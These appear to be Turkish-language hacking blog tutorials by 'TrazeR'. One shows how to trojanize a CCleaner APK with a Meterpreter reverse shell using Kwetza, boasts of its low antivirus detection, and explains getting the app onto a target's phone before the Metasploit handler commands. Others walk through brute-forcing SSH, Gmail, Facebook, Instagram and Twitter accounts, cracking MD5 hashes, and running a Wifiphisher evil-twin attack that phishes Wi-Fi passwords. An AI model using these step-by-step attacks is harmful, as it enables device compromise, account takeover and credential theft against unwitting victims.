-->

Kali Linux Android Hack 2

Selamun Aleyküm ..


Kwetza, Android Uygulamalarinin Varsayilan İzinlerini Kullanarak İşlevsellik Kazanmak İçin Gerekli İzinleri Oluşturup Bu İzinleri Mevcut Android Uygulamasina (APK) Enjekte Etememize Yarar.
 Yani Kısaca Mevcut Bi Android Uygulamasına Meterpreter Payloadı Enjekte Etmenizi Sağlar.
git clone https://github.com/sensepost/kwetza.git
Yazarak İndrin
Kwetza Piton İle Yazılmıştır Ve PİP Kullanarak Kurulabilen BeautifulSoup Gerektirir.
pip install beautifulsoup4
Kullandığınız İşletim Sisteminde Apktool'un Kurulu Olması Gerekiyor Eğer Değilse Buradan Bakıp İndirip Yükleyin Yada apt-get install apktool
Şimdi Hedef Bi Tane Android Uygulaması Bulun Yani Karşı Tarafa Göndereceğimiz Apk Ben Cclenear Uygulamasının Apk'sini İndirdim Bu Apk Bir Oyun Olabilir Yada Başka Birşey. Ccleaner-pro.apk 'sini Kwetza Klasörünün İçine Attım Ardından chmod +x kwetza.py Yazarak Gereken İzinleri Verdik.


Yeni Bi Terminal (Komut Satiri) Açip ifconfig Yazarak Yerel İp Adresimizi Öğreniyoruz.
192.168.38.128
python kwetza.py ccleaner.apk 192.168.1.9 4444 yes
Yazarak Zararli Android Uygulamamizi Oluşturuyoruz.
ccleaner.apk Paylod Enjekte Edeceğimiz Apk
192.168.1.9 Bağlantı Sağlayacığımız İp Adresi
4444 Bağlantı Sağlayacağımız Port Numarası 
Oluşturmaya Başladıktan Sonra Bizden  Şifre Girmemizi İstiyor Default Olarak password Yazıp Onaylıyoruz Ve Zararli Uygulamamizi Oluşturdu
Zararlı Uygulamamizi Kwetza Klasörünün İçine Uygulamamız Adında Dosya Oluşturup Dist Dosyasının İçine ccleaner.apk Olarak Kayıt Etti.
Virüs Total Sonucu Burada
59 Antivürüsden 6 Tanesi Yakaladi Neyse Bu Olusturdugumuz Apk yi Bir Şekilde Hedefe Gönderip Telefona Kurmasını Sağlıyoruz Ardından Metasploit'i Açıp Gerekli Exploiti Ve Payloadı Belirtip Ayarları Yaptıktan Sonra Exploit Ediyoruz

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.9
set lport 4444
exploit 
Yazarak Exploit Ediyoruz Ve Oturum Açılıyor
Normalde Bu Apk yi Test Edicektim Ancak Diğer Pc de Sıkıntı Yaşadım O Yüzden Test Etme Şansım Olmadı Umarım Anlasılır OLmustur...

TrazeR Sunar /

Kali Linux Facebook İnstagram Twitter Brute Force

Selamun Aleyküm ..

Brut3k1t Çeşitli Protokoller İçin Sözlük Saldirilarini Destekleyen Bir BruteForce Modülüdür.
Tamamlanmiş Ve Desteklenen Mevcut Protokoller Şunlardir : 

Protokoller:
Ssh
Ftp
Smtp
Xmpp

Web Tabanli Hizmetler:
İnstagram
Facebook
Twitter

Kurulum:

Kurulum Basittir. Brut3k1t, Bazı Bağımlılıkları Gerektirir Bu Bağımlılıklar, extras Klasöründe Bulunan installer.py Yürütülebilir Dosyasını Çalıştırarak Yüklenir.

git clone https://github.com/ex0dus-0x/brut3k1t


cd Desktop/
cd brut3k1t/
cd extras/
ls
python installer.py

Sistem Numaranızı Yazıp Onaylayın

Gerekli Paketlerin Yüklemenmesini Bekleyin.

Kurulumda Hata Alirsaniz Gerekli Bağımlılıklari Manuel Yükleyniz.

Kullanim Örnekleri:
192.168.1.3 İp Adresi Üzerinde Çalışan SSH'ye Bruteforce İçin
SSH: python brut3k1t.py -s ssh -a 192.168.1.3 -u root (kullanici adi) -w wordlistyolu.txt
Program Otomatik Olarak Bağlanti Noktasini 22 Olarak Ayarlar Port Farkliysa -p Parametresiyle Portu Belirtiniz.

Gmail: test@gmail E-postasını Wordlist.txt ile 25 Numarali Bağlanti Noktasindan 3 Saniye Gecikmeli Olarak Kirma. E-posta İçin SMTP Sunucusunun Adresini Kullanmaniz Gerekir. Örnegin, Gmail= smtp.gmail.com Diğer Mail Servislerinin Smtp Adreslerini Google de Arayarak Bulabilirsiniz.
python brut3k1t.py -s smtp -a smtp.gmail.com -u test@gmail.com -w wordlistyolu.txt -p 25 -d 3

XMPP: test@creep.im 'i Varsayilan Port 5222 Wordlist.txt İle Bruteforce.
XMPP Aynı Zamanda SMTP'ye Benzer, XMPP Sunucusunun Adresini Sağlamanız Gerekecektir. (Bu Kısmı Bende Pek Anlayamadim)
python brut3k1t.py -s xmpp -a creep.im -u test(k.adi) -w wordlistyolu.txt

Facebook: Facebook Brute Force İçin Kullanici Adi, E-Posta, Telefon Numarasi Gerektirir.

python brut3k1t.py -s facebook -u kullaniciadi -w wordlistyolu.txt

İnstagram : Kullanici Adi Test Olan İnstagrami Wordlist İle 5 Saniyelik Gecikme İle Bruteforce

python brut3k1t.py -s instagram -u test -w wordlistyolunuz.txt -d 5

Twitter: Kullanici Adi Test Olan Twitterra Wordlist İle  Bruteforce

python brut3k1t.py -s twitter -u test -w wordlistyolunuz.txt
Örnek Facebook Brute Force :
python brut3k1t.py -s facebook -u sahink.754 -w  /root/Desktop/passss.txt -d 15




-d Parametresi İle Süre Belirtin Yoksa Ben Gibi Banlanırsınız :)
Bu Arada Resim Boyutu İçin Kusura Bakmayın


Şifreyi Kırdığında Otomatik Olarak Login OLuyor.

TrazeR Sunar //

Hash Kracker Console (Windows) Md5 Decrypt

Selamun Aleyküm 

Geçen Gün Bi Arkadaşımız Hash Kırmak İçin Program Soruyordu Onun Sorusuna Cevaben Bu Konuyu Hazırlamak İstedim. Bu Kullanacagımız Araç Windows İşletim Sistemlerinde MD5'i  Decrpyt Etmeye Yarar. Kısaca Brute Force Yapar

Hashkracker.zip Dosyasını İndirip Masaüstüne Zipten Çıkartıyoruz

İçinde Default Olarak passlist.txt Adında Bi Metin Belgesi Geliyor Bu Metin Belgesinin İçinde Bazı Sözcükler Şifreler Var Dilerseniz Kendiniz Bir Wordlist Hazırlayabilirsiniz Yada Buradaki Adresten Hazır Wordlist İndirebilirsiniz.

Windowsda Komut İstemini (cmd) Açarak İndirdiğimiz Hashcracker Dizinine Giriyoruz.

cd Desktop
cd hashkracker
hashkrackerconsole.exe 
Yazarak Kullanımı Ve Parametreleri Hakkında Bilgi Alabilirsiniz.


hashkracker -d -f  Wordlist Yolu Kırılacak Hash
Yazarak Brute Force İslemını Başlatıyoruz


Devam Etmek İçin Bir Tuşa Basıyoruz

Passlist.txt Dosyamızın İçinde Bulunan Kelimeleri Tek Tek Deneyerek Kısa Sürede Şifrelenmis Kelimeyi Buldu  ;
(Bu İşlem Wordlist Boyutuna Göre Uzayip Kısalabilir.)

MD5 : bbf2dead374654cbb32a917afd236656
Decrypt : ABC123

Şimdi Başka Bi Şekilde Brute Force Yapalım 
Hashkrackerconsole -b -m 4 -l 6 -c ABCDEFGH123456 bbf2dead374654cbb32a917afd236656

Buradaki Parametrelerin Açıklamasını Yapalım ; 
-b Bruteforce Crack
-m Minimum Şifre Uzunlıuğu
-l Maksimum Şifre Uzunluğu
-c Denenecek Parola Modeli


Devam Etmek İçin Bir Tuşa Basıyoruz

Sonuç: ABC123

 Hashkracker Console Download
 Hashkracker Altarnatif

TrazeR Sundu //

EDİT : 
Viristotal Link

4 A.v Tarafindan ; W32.eHeur.Malware08 , Hacktool.Secxpld.PS4 Olarak Algılanmaktadir Kendi Bilgisayarımda Kullandıgım Bi Araç Herhangi Bir Sıkıntıyla Karşılaşmadim.


Kali Linux Wifiphisher

Selamun Aleyküm ...

 HAKKKİNDA

Wifiphisher Kimlik Bilgilerini Elde Etmek Veya Mağdurlara Malware Bulaştırmak İçin Otomatikleştirilmiş, Özelleştirilmiş Ve Phishing Saldirilarinda Kullanilan Bir Araçtir.
Öncelikle Herhangi Bir Kaba Kuvvet (Brute Force) İçermeyen Diğer Yöntemlerin Aksine, Sosyal Mühendislik Saldırısıdır.
Wifiphisher Kali Linux Üzerinde Çalışır Ve GPL Lisansi İle Lisanslidir.

NASIL ÇALİŞİR ?

Ewil Twin Saldırısını Kullanarak Bir Man İn The Middle (Ordaki Adam,Aradaki Adam) Pozisyonunu Elde Ettikten Sonra Wifiphisher Tüm HTTP İsteklerini Saldırgan Tarafından Kontrol Edilen Kimlik Avı Sayfasina Yönlendirir.

Kurbanın Bakış Açısına Göre, Saldiri Üç Aşamali Olarak Kullanilmaktadir:

 Wifiphisher Varolan İlişkilendirmeleri Bozmak İçin "Deauthenticate" Veya "Disassociate" Paketleri Oluşturarak  Mağdurun Erişim Noktasindaki Tüm Wifi Aygitlarini Sürekli Araliklarla Sıkıştirir Ve Bağlantısı Kesilir. Mağdur Saldırgan Tarafından Yapilan Erişim Noktasina Katilir. Wifiphisher Alani Koklar Ve Hedef Erişim Noktasinin Ayarlarini Kopyalar Daha Sonra Sahte Bir Kablosuz Erişim Noktası Oluşturur. Aynı Zamanda Bir NAT / DHCP Sunucusu Kurar Ve Doğru Bağlantı Noktalarini İletir. Sonuç Olarak Sıkışma (Ağdan Düşme) Nedeniyle Sahte Erişim Noktasına Bağlanmaya Başlayacaktir. Bu Aşamadan Sonra Kurban Mitmed' (Man İn The Middle) dir.

 Kurban Gerçekci Özel Olarak Özelleştirilmiş Bir Kimlik Avi Sayfasini Görür. Wifiphisher, HTTP Ve HTTPS İsteklerine Cevap Veren Minimal Bir Web Sunucusu Kullanmaktadir. Kurban, İnternetten Bir Sayfa İstediğinde, Wifiphisher Kimlik Bilgilerini İster Malware Hizmeti Veren Gerçekci Bir Sahte Sayfa İle Cevap Verecektir. Bu Sayfa Özellikle Kurban İçin Hazırlanacak. Örneğin, Yönlendirici Yapılandırma Görünümlü Bir Sayfa, Kurbanin Sağlayicisinin Logolarini İçerecektir. Araç Farkli Kimlik Avi Senaryolari İçin Topluluk Tarafindan Oluşturulmuş Şablonlari Desteklemektedir.


GEREKSİNİMLER
Wifiphisher'dan En İyi Şekilde Yararlanmak İçin Aşağidakiler Gereklidir:

İnsanlar Diğer Dağıtımlarda Wifiphisher'i Çalıştirmasina Rağmen, Kali Linux Resmi Olarak Desteklenen Dağıtım Olduğundan, Tüm Yeni Özellikler Öncelikle Bu Platform Üzerinde Test Edilmiştir.
Ap Modunu Destekleyen Bir Kablosuz Ağ Adaptörü. Monitör Modunu Destekleyen Ve Enjeksiyon Yapabilen Bir Kablosuz Ağ Adaptörü. Sürücüler Netlink'i Desteklemelidir. 
İkinci Bir Kablosuz Ağ Bağdaştiricisi Yoksa, Araci --nojamming Seçeneğiyle Çalıştırabilirsiniz. 

KURULUM

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher/
sudo python setup.py install
İnstall Yazmayi Unutmayin Ben Gibi :) 

Kurulum İşlemini Gerçekleştirdiktan Sonra Yeni Terminal Açın Yada Açmayın Siz Bilirsiniz :)
Benim İkinci Bi Kablosuz Ağ Adabötürüm Olmadığı İçin wifiphisher --nojamming Yazarak Başlatıyorum Aracı.



Çevremdeki Yayın Yapan Ağları Taramaya Başladı. Hedefi Yön Tuşlarıyla (Yukari Aşaği) Seçerek Enterliyoruz.


Ardından Böyle Bi Sayfa Karşılıyor Bizi


Buradan Wifiphsherde Bulunan Mevcut Phising Senaryolari Var Buradan İstediğinizi Seçin Ben 1 Numarayı Seçtim.

Yukaridaki Metnin Translate Edilmiş Hali Aşağidaki Gibidir. :
Mevcut fisingleme senaryoları
1. üretici yazılımı güncelleme sayfası
Logolar veya markalar olmadan, WPA / WPA2 şifresi isteyen bir yönlendirici yapılandırma sayfası, bir bellenim yükseltmesi nedeniyle. Mobil cihazlara uygun.

2. ağ yöneticisi bağlan
Ağ yöneticisinin davranışını taklit eder. Bu şablon, chrome'un bağlantı başarısız sayfasını gösterir ve ön paylaşımlı anahtar isteyen sayfada bir ağ yöneticisi penceresi görüntüler. Şu anda ağ yöneticileri windows ve mac os ara desteklenmektedir.

3. 0Auth giriş sayfası
Oauth kullanarak kimlik doğrulaması yapmak için facebook kimlik bilgilerini isteyen ücretsiz bir wifi servisi

4. tarayıcı eklentisi güncellemesi
Kurbanlara yükler sunmak için kullanılabilen genel bir tarayıcı eklentisi güncelleme sayfası

+ Kullanmak istediğiniz senaryonun (num) numarasını seçin:

Senaryomuzu Seçtikten Sonra Wifiphisher Aracı Bizim İçin Gerekli Ayaarlamalari Yapıyor Sahte Wifi Ağını Oluşturuyor Ve Gerçek Ağın Bağlantısını Kesmeye Çalısıyor.
Gördüğünüz Gibi Ağın Aynısını Oluşturmus Hiç Bi Fark Yok.

Şimdi Buradan Sonrasını Teknik Bi Ariza Nedeniyle Gösteremıyorum Ama Yapıcak Birşey Kalmadı Zaten Kurban Bizim Ağa Bağlandıgında Wifi İçin Upgrade Ve Parola İsteyecek Bilgileri Girdiğinde Programa Düşecek Bilgiler.

Umarım Anlaşılır Olmuştur.

TrazeR Sunar //


Kali Linux Virtualbox İnstall

Selamun Aleyküm ..

Vİrtualbox'su Genelde Windowsa Kurar Üstüne Sanal Olarak Linux Kurup Kullanırız. Bu Gün O Alışıla Gelmiş Adeti Bozuyorum :) Tam Tersini Yapıcaz Linuxsa VirtualBox Kurup, Sanal Olarak Windows Kuracağız..
 Benim Gibi Sistemi Komple Linux Tabanlı Olan Arkadaşlar İçin İdeal Bi Konu Olacağını Düşündüğüm İçin Bu Konuyu Hazırlıyorum .. 

/etc/apt/ Dizininde Bulununan Sources.list Dosyamızı Açıp Aşağidaki Komutu Ekliyoruz.
Deb http://download.virtualbox.org/virtualbox/debian yakkety contrib


Ekleyip Kayıt Edip Çiktiktan Sonra apt-get update Komutuyla Güncelliyoruz


Ardindan  apt-get install virtualbox-5.1 Komutunu Girip Kuruyoruz.


Evet KurulumAşamasi Bitti 
Şİmdi Yan Menüde Bulunan Uygulamalari Göster Kısmına Virtual Yazarak Virtualboxsu Açıyoruz

Ve Linuxda Virtualboxsa Hoş Geldiniz :) 



Gerisini Siz Biliyosunuz ;)

TrazeR Sunar //

Kali Linux Hash-İdentifier

Selamun Aleyküm .. 

Bugun Sizlere Bi Çoğunuzun Bildiği, Yada Bilmediği, Yadaaa İlk Kez Adını Duyduğu  Hash-İdentifier 'den Bahsedeceğim.
 Aslına Bakarsanız Çok Anlatılacak Bahsedelicek Bi Durum Yok hash-identifier Şifreleme Türünü Tespit Etmeye Yarayan Bir Araçtır
Örnek Vericek Olursak; Sql İncektion Açığıyla Veritabanindan Bilgi Süzdünüz Admin Bilgisi Hash Olarak Geldi.. 
Nabıyoruz Hemen Hashkiller 'e Yada O Tarz Sitelere Girip MD5 Olarak Decode Etmeye Çalışıyoruz. Bazen Kırıyo Bazen Kıramıyor.
 Süzülen Bilginin MD5 Oldugunu Nerden Biliyoruz ? Bilmiyoruz Çünki Ezbere Giriyoz.

Linuxda Terminal Açıp
hash-identifier 
Yazıp Açıyoruz

Aracımız Açıldı 
HASH: 
Kısmına Şifrelenmiş Metni Girip Entarlıyoruz Bu Kadar
*EF9AC024048F2530A59240C62CC218EC8DA28D94


Hash Degerını Gırdık Taakkk Şifreleme Türünü Ve Algoritmasini Verdi 
MySQL 160bit - SHA-1 (SHA-1 ($pass))

Hash Türünü Tespit Ettikten Sonra Brute Force İşine Başlayalabiliriz.

Hash İdentifier Desteklenen Şifreleme Biçimleri Aşağidaki Gibidir :

  • ADLER-32
  • CRC-32
  • CRC-32B
  • CRC-16
  • CRC-16-CCITT
  • DES(Unix)
  • FCS-16
  • GHash-32-3
  • GHash-32-5
  • GOST R 34.11-94
  • Haval-160
  • Haval-192 110080 ,Haval-224 114080 ,Haval-256
  • Lineage II C4
  • Domain Cached Credentials
  • XOR-32
  • MD5(Half)
  • MD5(Middle)
  • MySQL
  • MD5(phpBB3)
  • MD5(Unix)
  • MD5(Wordpress)
  • MD5(APR)
  • Haval-128
  • MD2
  • MD4
  • MD5
  • MD5(HMAC(Wordpress))
  • NTLM
  • RAdmin v2.x
  • RipeMD-128
  • SNEFRU-128
  • Tiger-128
  • MySQL5 - SHA-1(SHA-1($pass))
  • MySQL 160bit - SHA-1(SHA-1($pass))
  • RipeMD-160
  • SHA-1
  • SHA-1(MaNGOS)
  • Tiger-160
  • Tiger-192
  • md5($pass.$salt) - Joomla
  • SHA-1(Django)
  • SHA-224
  • RipeMD-256
  • SNEFRU-256
  • md5($pass.$salt) - Joomla
  • SAM - (LM_hash:NT_hash)
  • SHA-256(Django)
  • RipeMD-320
  • SHA-384
  • SHA-256
  • SHA-384(Django)
  • SHA-512
  • Whirlpool
  • And more…



Bu Arada Yukaradaki Hashin Çözülmüş Hali Aşağidadir.

Hash                           Type           Result
*EF9AC024048F2530A59240C62CC218EC8DA28D94 MySQL4.1+ freestuff

TrazeR Sunar //